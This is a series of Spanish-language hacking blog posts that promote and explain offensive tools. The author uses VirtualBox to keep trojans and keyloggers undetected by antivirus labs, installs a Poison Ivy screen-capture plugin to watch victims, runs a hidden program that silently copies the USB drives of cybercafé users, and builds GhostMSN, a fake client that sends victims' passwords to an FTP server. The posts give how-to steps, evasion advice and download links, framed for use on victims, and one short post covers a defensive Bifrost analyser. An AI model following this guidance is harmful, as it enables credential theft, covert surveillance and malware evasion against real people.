VirtualBox es un software de virtualización que nos permite ejecutar distintos sistemas operativos como Windows, Linux, Mac OS X, OS2 dentro de nuestro O.S. actual.
Esta aplicación, además de ser software libre, es ideal para testear nuevos sistemas operativos sin tener que molestarnos en crear particiones, modificar el MBR, o sufrir cualquier otro problema relacionado con nuestro disco rígido. VirtualBox también posee algunas caracteristicas extras como: Controladores USB Virtuales, Carpetas Compartidas, posibilidad de configurar un servidor remoto con el protocolo RDP, etc.
Virtual box en troyanos y virus
Algunos de los usos que se le dan a una pc virtual en este ambito son los siguientes:
-Testear que tan indetectable son nuestros server de troyanos, keylogger o virus.
Es lo mejor que pueden tener para esto, por 3 motivos:
El primero es que las muestras no se envian a los laboratorios de los antivirus, por lo tanto si tienen un server indetectable solo para ustedes, mientras los testeen en su maquina virtual estara seguro e indetectable por muchisimo tiempo.
El segundo motivo es que se pueden tener multiples antivirus, o multiples pc virtuales con distintos SO, pueden tener combos de antivirus, por ejemplo AVG, nod32 panda y avast en una pc con win XP, y en otra pc pueden tener Kaspersky, antivir, norton y bitdefender con win Vista, etc.
El tercer motivo es que los server se escanean durante la ejecucion tambien (MUY importante), quiere decir que al ejecutar el archivo infectado alertara o no el antivirus, porque suele pasar muchas veces que el antivirus no detecta ningun virus cuando se lo escanea con VT o paginas similares, o tambien con programas como el scanlix o el kims, Pero resulta que al ejecutar el archivo salta el antivirus alertando que el archivo esta infectado.
En la imagen pueden ver al AVG KAV y nod32 corriendo al mismo tiempo, ninguno detecto mi virus con el kims pero al ejecutarlo salto el AVG y borro el virus.
-Testear troyanos, bots, keylogger, virus, encriptadores infectados, etc.
Podemos testear si esta bien creado el server de nuestro troyano, si funciona el keylogger o los distintos tipos de bot.
Podemos testear virus para ver si en verdad funcionan, y si hacen su trabajo, para que probarlo en nuestra pc o en alguna victima si lo podemos probar en una pc virtual y ver en tiempo real el daño que hace sin tener que preocuparse por nuestra pc.
Tambien sirve para testear encriptadores, binder, joiner o distintas herramientas que pensemos que estan infectadas o que puedan dañar nuestro equipo.
Y algo tambien muy importante es que nos sirve para testear distinto malware en distintos SO, por ejemplo podemos provar si nuestro bifrost funciona en Vista, y nos daremos cuenta de que si funciona pero que no funciona el keylogger, entonces probamos algun keylogger y nos damos cuenta de que el de prohide si funciona XD.
Para instalar un sistema operativo necesitan un cd booteable o sino una .iso, Proximamente posteare un manual, tambien pueden probar vmware que no es libre, pero es muy buena.
VirtualBox 1.5.6-1 Win x86.msi (windows)
VirtualBox 1.5.6-1 Linux x86.run (linux)
VirtualBox 1.5.6 (todas las plataformas)
21demarzo Publicado por MAURO Etiquetas: OTROS, SCANNERS, SEGURIDAD, UTILIDADES
Arhack creo un escaner de puertos muy bueno para los usuarios de troyanosyvirus, permite escanear los puertos de la pc local o de alguna pc remota cualquiera, simplemente colocando su ip o su direccion web. Una de las principales ventajas que tiene es que permite elegir el rango de escaneo, y asi escanear todos los puertos, a diferencia de los escaneos online que solo escanean los puertos mas conocidos. Esto les puede servir a nuestros usuarios para comprobar que tienen bien abiertos los puertos para el uso de sus troyanos o herramientas.
Imagenes:
Recomiendo que escaneen los puertos de a series de 2000, por ejemplo de 0 a 2000, despues de 2000 a 4000 y asi, es mas seguro.
Por ejemplo Para comprobar que tienen abierto el puerto 2001 del bifrost, ejecutamos el bifrost y lo ponemos a la escucha a ese mismo puerto, seguidamente abrimos el escaner y ponemos escanear a la ip 127.0.0.1 los puertos (obiamente seleccionamos un rango entre 2001, por ejemplo de 0 a 3000), si sale el puerto 2001 quiere decir que esta abierto y el bifrost deberia funcionar correctamente en nuestro pc.
Descarga:
Escaner de puertos by arhack V1.0 (miarroba)
Escaner de puertos by arhack V1.0 (rapidshare)
Aclaro que el archivo lo analize exaustivamente con todo, porque vi que pesaba muy poco, pero les aseguro que no tiene ninguna sorpresa, por las dudas desconfien les dejo el analisis de anubis:
analisis de anubis
Si quieren el codigo fuente lo pueden pedir dejando su mail en un comentario, yo me encargo de que se lo envie
18defebrero Publicado por MAURO Etiquetas: OTROS, UTILIDADES
El poison ivy es uno de los mejores troyanos que existen, pero hay que admitir que su captura de pantalla es pesima.
Por suerte th3 s13az3 creo un plugin en delphi que mejora notablemente la captura. Permite elegir la calidad de la imagen y ajustar el tamaño de la ventana a nuesrta preferencia.
Como usar los plugins en el poison ivy
Para usarlo simplemente tenemos que descargar el plugin y descomprimirlo en la carpeta "Plugins" de nuestro poison ivy.
Despues abrimos nuestro poison y en menu file seleccionamos manage file, ponemos load si no aparece nada y seleccionamos Optix_ScreenCapC.dll que esta justamente en la carpeta plugins.
Ya tenemos nuestro plugin instalado, ahora hacemos doble clic sobre una victima, nos vamos al menu plugins y hacemos click en O.P screen capture parasubir el plugin (como se ve en la primera imagen de abajo), una vez subido el plugin en la pc victima nos aparecera Optix Screen Capture para poder ver su pantalla.
Recomiendo que vallan probando las distintas calidades de imagen y a distintos tamaños para mejorar la velocidad de transferencia, yo por ejemplo le puse en quality 30 y la pantalla completa y funciona bastante bien y se pueden ver todos los textos en la pc remota.
La descarga y el codigo fuente estan al final del post
Imagenes:
Descargas:
Optix Screen Capture 2.0 (pagina oficial)
Optix Screen Capture 2.0 (mirror rapidshare)
Source (pagina oficial)
14deenero Publicado por MAURO Etiquetas: INDETECTABLES, OTROS, UTILIDADES
Esta aplicacion creada por Angel Sanchez, sirve para robar toda la informacion que se encuentre en un disco extraible, puede ser utilizado en ciberCafes universidades, etc.
Cuando se inserta un disco extraíble (pendrive, mp3, mp4, camaras, etc.) todos los datos serán copiados de forma silenciosa a una carpeta oculta.
Este programa puede ser muy util para algunas personas, ademas no es reconocido como una herramienta de hacking, asi que es totalmente indetectable por los antivirus.
Como se usa:
Primero se debe copiar o descoprimir toda esta carpeta en un lugar oculto donde ningún usuario la vea.
Después se ejecuta el programa instalar.
Una ves instalado no se debe cambiar el nombre a esta carpeta y mucho menos moverla a otro sitio.
La próxima ves que se inserte un disco extraíble todos los datos serán copiados de forma silenciosa en esta misma carpeta.
Solo funciona con el usuario actual de windows.
Para desinstalar el programa, ejecuten el desinstalador y listo (los archivos copiados deben ser borrados manualmente)
Descarga:
Robar datos de los discos extraíbles
7deenero Publicado por MAURO Etiquetas: SEGURIDAD, UTILIDADES
Este programa es ideal para los que han sido infectado con el troyano Bifrost.
Seleccionas el archivo que piensas que tiene el server y te recuperara toda la informacion del mismo, como DNS, puertos, donde se instala, en que programa se inyecta, etc. Lo bueno que tiene este programa es que te recupera la informacion del server aunque este haya sido encriptado.
Lo malo es que funciona unicamente para la version 1.2 (no funciona con la 1.2b)y no funciona si el server a sido "bindeado" con otro archivo.
Descarga:
Antifrost 1.2
29dediciembre Publicado por MAURO Etiquetas: MSN, UTILIDADES
Ghost msn es un fake avanzado para msn. Con la caracteristica especial que permite enviar las contraseñas de msn a un servidor FTP.
Cuando la victima abra el fake le saldra un error diciendo que no se cargaron las opciones (ustedes pueden configurar este mensaje a su gusto). Entonces cuando la victima se conecte con su id de passport su contraseña sera enviada a nuestro servidor ftp.
Con el GhostMSN Builder creamos el fake del live msn, para ello debemos colocar nuestro servidor ftp usuario y pasword (se pueden crear una cuenta en miarroba.com o en www.ueuo.com)
Es la primera version de este fake, por lo que puede tener errores, yo ya encontre algunos.
Para que la victima caiga hay que saber utilizar un pokito la cabeza, o bien adjuntar el fake a un archivo batch que reemplaze el msn "original" por el fake.
Acerca del programa:
Version: 1.0
Tamaño: 800Kb
Plataforma: Tested unicamente enे Windows Xp
Works On MSN: Built based on Wlm8.5
Dependencias: Visual Basic Runtimes (las incluyo al final)
compilado el 24/12/07
Limitaciones:
Custom Message: 49 Caracteres
FTP URL: 50 Caracteres
FTP Username: 29 Caracteres
FTP Password: 14 Caracteres
Descarga:
GhostMSN V1.0 (Pagina oficial, sin dependecias)
GhostMSN V1.0 (subido por mi con todas las dependencias)
GhostMSN V1.0 (mirror rapidshare)
Pagina oficial: http://unexplained.tk/
7dediciembre Publicado por MAURO Etiquetas: UTILIDADES
Tienes Ip fija no podes descargar simultaneamente de rapidshare?. Este programa de facil manejo te ayudará a bajar simultaneamente los archivos que quieras.
Para descargar archivos simplemente debemos colocar el link de rapidshare donde dice rapidshare url y poner go, y nos saldra la pagina de rapidshare como si estuvieramos conectado con otra ip, y a partir de ahy seguimos los pasos tipicos para descargar de rapidshare.
Descarga Rapid Hacker v3.0
Quick Batch File Compiler es la herramienta ideal para todas aquellas personas interesadas en programar en Batch. Para muchos este lenguaje es demasiado simple pero es esta su principal ventaja, porque no se necesita demasiado preparación o habilidad para hacer una enorme cantidad de cosas usando Batch. Lo que hace QBFC es convertir nuestros archivos. Bat en .exe y al mismo tiempo nos ofrece la estupenda opción de hacer que el ejecutable obtenido trabaje de forma oculta, además también podemos incluir dentro del .exe pequeños archivos necesarios para ciertas tareas, tales como claves de registro o algún otro documento.
Es excelente para hacer programas portables si lo combinamos con Winrar, ya que podremos incluir muchas más opciones de arranque y configuración.
